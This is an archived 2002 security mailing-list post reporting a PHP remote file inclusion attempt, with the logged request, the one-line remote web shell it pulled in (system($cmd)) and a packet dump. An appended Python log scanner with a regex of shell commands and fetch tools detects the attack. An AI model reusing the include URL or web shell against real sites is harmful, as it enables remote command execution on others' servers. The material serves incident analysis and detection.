Good practical php attack example

From: zeno (bugtraq@cgisecurity.net)
Date: 09/17/02


From: zeno <bugtraq@cgisecurity.net>
To: webppsec@securityfocus.com
Date: Tue, 17 Sep 2002 14:12:39 -0400 (EDT)

I figured a few people may find this interesting.

200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"

contents of www.jtecx.hpg.com.br/jtec.txt

------------------- start snip

<?php
system($cmd);
?>

------------------- end snip

He is attempting to include code from site B into site A and have it execute the code locally.
You can see he is issuing it commands via a query "&cmd=uname%20-a;id".

Anyone else have any good examples of these types of attacks? Real life experiences, etc...

- zeno@cgisecurity.com

FULL PACKET DUMP BELOW

0x0000: 00 A0 24 91 0E C2 00 01 97 DB C8 00 08 00 45 00 ..$...........E.
0x0010: 02 36 C6 13 40 00 25 06 58 54 C8 98 50 16 C7 7D .6..@.%.XT..P..}
0x0020: 55 2E 08 57 00 50 BA AF F1 7E C9 CF A9 D0 50 18 U..W.P...~....P.
0x0030: E4 20 9A 2D 00 00 47 45 54 20 2F 69 6E 64 65 78 . .-..GET /index
0x0040: 2E 70 68 70 3F 66 69 6C 65 3D 68 74 74 70 3A 2F .php?file=http:/
0x0050: 2F 77 77 77 2E 6A 74 65 63 78 2E 68 70 67 2E 63 /www.jtecx.hpg.c
0x0060: 6F 6D 2E 62 72 2F 6A 74 65 63 2E 74 78 74 26 63 om.br/jtec.txt&c
0x0070: 6D 64 3D 75 6E 61 6D 65 20 2D 61 3B 69 64 20 64 md=uname -a;id d
0x0080: 20 48 54 54 50 2F 31 2E 30 0D 0A 41 63 63 65 70 HTTP/1.0..Accep
0x0090: 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 6D t: image/gif, im
0x00A0: 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 69 age/x-xbitmap, i
0x00B0: 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 65 mage/jpeg, image
0x00C0: 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 74 /pjpeg, applicat
0x00D0: 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 6C ion/vnd.ms-excel
0x00E0: 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 76 6E , application/vn
0x00F0: 64 2E 6D 73 2D 70 6F 77 65 72 70 6F 69 6E 74 2C d.ms-powerpoint,
0x0100: 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D 73 77 application/msw
0x0110: 6F 72 64 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 ord, */*..Accept
0x0120: 2D 4C 61 6E 67 75 61 67 65 3A 20 70 74 20 2D 62 -Language: pt -b
0x0130: 72 0D 0A 41 63 63 65 70 74 2D 20 45 6E 63 6F 64 r..Accept- Encod
0x0140: 69 6E 67 3A 20 67 7A 69 70 20 2C 20 64 65 66 6C ing: gzip , defl
0x0150: 61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ate..User-Agent:
0x0160: 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F Mozilla/4.0 (co
0x0170: 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 mpatible; MSIE 6
0x0180: 2E 30 3B 20 57 69 6E 64 6F 77 73 20 39 38 3B 20 .0; Windows 98;
0x0190: 51 33 31 32 34 36 31 29 0D 0A 56 69 61 3A 20 31 Q312461)..Via: 1
0x01A0: 2E 31 20 66 77 2D 61 73 73 2E 70 72 75 64 65 2E .1 fw-ass.prude.
0x01B0: 6E 65 74 3A 38 30 38 30 20 28 53 71 75 69 64 2F net:8080 (Squid/
0x01C0: 32 2E 34 2E 53 54 41 42 4C 45 36 29 0D 0A 58 2D 2.4.STABLE6)..X-
0x01D0: 46 6F 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 32 Forwarded-For: 2
0x01E0: 30 30 2E 31 35 32 2E 38 33 2E 31 39 39 0D 0A 48 00.152.83.199..H
0x01F0: 6F 73 74 3A 20 77 77 77 2E 63 67 69 73 65 63 75 ost: www.cgisecu
0x0200: 72 69 74 79 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D rity.com..Cache-
0x0210: 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 67 65 Control: max-age
0x0220: 3D 33 30 30 30 30 30 30 0D 0A 43 6F 6E 6E 65 63 =3000000..Connec
0x0230: 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 tion: keep-alive
0x0240: 0D 0A 0D 0A ....

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
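Added example, not part of zeno's post or of the list archive: a small Python detector for the request pattern quoted above, run over the quoted access-log line plus two constructed lines (the hosts and addresses in those two are made up for the example). The attack relies on the target script doing something like include($_GET['file']) with allow_url_fopen enabled, so that the remote jtec.txt is fetched and executed, and on register_globals so that the cmd query parameter becomes the $cmd that jtec.txt passes to system(). The two things worth alerting on are therefore a URL in a parameter value and shell syntax in another.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# NCSA combined log format (the format of the line quoted in the post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter whose value names a remote resource is the RFI tell:
# a script doing include($_GET['file']) fetches and runs it.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Shell separators or common recon commands in a parameter value: the
# payload half of the attack (the included file hands it to system()).
# Coarse heuristic; tune the word list to your own traffic.
SHELL_RE = re.compile(r'[;|`]|\$\(|\b(?:uname|id|wget|curl|cat|ls)\b')

# Sample log: line 1 is the one quoted in the post; lines 2 and 3 are
# constructed for this example (hosts and addresses are made up).
SAMPLE_LOG = [
    '200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"',
    '10.0.0.5 - - [14/Sep/2002:16:50:01 -0400] "GET /index.php?file=about.html HTTP/1.0" 200 1203 "-" "Mozilla/4.0"',
    '10.0.0.9 - - [14/Sep/2002:16:51:17 -0400] "GET /index.php?file=ftp%3A%2F%2Fexample.invalid%2Fs.txt&cmd=id HTTP/1.1" 200 512 "-" "curl/7.9"',
]


def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs.

    Done by hand rather than with urllib.parse.parse_qsl because older
    Pythons treat ';' as a pair separator and would split 'uname -a;id'.
    """
    params = []
    for field in query.split('&'):
        if not field:
            continue
        name, _, value = field.partition('=')
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def parse_line(line):
    """Parse one combined-format line; return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['params'] = parse_query(parts.query)
    return rec


def analyse(line):
    """Return a record with the RFI-related findings for one log line."""
    rec = parse_line(line)
    if rec is None:
        return None
    findings = []
    for name, value in rec['params']:
        if REMOTE_RE.match(value):
            findings.append(('remote_include', name, value))
        if SHELL_RE.search(value):
            findings.append(('shell_command', name, value))
    return {'ip': rec['ip'], 'path': rec['path'],
            'status': int(rec['status']), 'findings': findings}


def scan(lines):
    """Return the analysed records that carry at least one finding."""
    hits = []
    for line in lines:
        rec = analyse(line)
        if rec and rec['findings']:
            hits.append(rec)
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        # Status 404 on the quoted line: index.php did not exist on that
        # host, so the attempt was logged but nothing was executed.
        print(hit['ip'], hit['path'], hit['status'], hit['findings'])
```

Running the file prints the two lines that carry findings; the benign about.html request is left alone. Two things from the post itself are worth carrying into any real detector: the 404 in the quoted line says the attempt hit a script that did not exist on www.cgisecurity.com, so it was an attempt and not a compromise; and the packet dump shows Via: 1.1 fw-ass.prude.net:8080 (Squid/2.4.STABLE6) with X-Forwarded-For: 200.152.83.199, so the 200.152.80.22 in the access log is a proxy, and the forwarded address should be recorded as separate, attacker-controllable data rather than trusted as the client.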